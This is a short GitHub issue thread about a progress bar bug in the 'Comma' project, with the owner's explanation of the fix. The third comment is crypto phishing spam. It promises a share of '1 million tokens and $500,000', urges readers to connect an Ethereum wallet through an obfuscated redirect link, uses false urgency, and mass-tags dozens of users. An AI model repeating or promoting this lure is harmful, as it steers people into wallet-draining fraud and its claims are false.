### ISSUE TITLE
ProgressBar Bug

### ISSUE THREAD

**Issue by gloomn** [gloomn/Comma#1]
When I add Folders several times, Progress Bar Value has an error!

**Comment by gloomn** [comment]
This bug is fixed by setting progress bar maximum value by if the directoryPaths.count exist or not. if directoryPaths.count > 0 -> progressBar.Maximum  = directoryPaths.count, if directoryPaths.count = 0 -> progressBar.Maximum = 0

**Comment by hfzi** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
Sylphritz, @PoIygon, @Joco11, @Deyvid4900, @anthonygenovese, @ChangIan, @HelloRoy618, @dev-ittechca-com, @ManuSaav-96, @Brettos1234, @horar, @ngtrphuong, @coding-zhang, @Vicg853, @RobertLii, @maxbyz, @erwandemerville, @oceanremotesensing, @RosaliaM24k, @Wtzd8645, @steveyoon77, @divyanshkhetan, @YoniiDev, @Rocko731, @santhose-kumar, @PikoCanFly, @BlueDragn, @YiCIANL, @appletsauce, @Michaela813, @sho-wen, @mmustafaozcan, @SPerju, @mcken1990, @Codyb2021, @mackiecarr89, @zxgrand, @ahashare, @Daiki48, @WilberC1219, @kayodekolawole, @AT-LOW45, @leacasas, @Marko9827, @Nomansiddiqui0340, @Hub-wen, @andreifo-dev, @AnasQiblawi, @ddmy, @gamegg
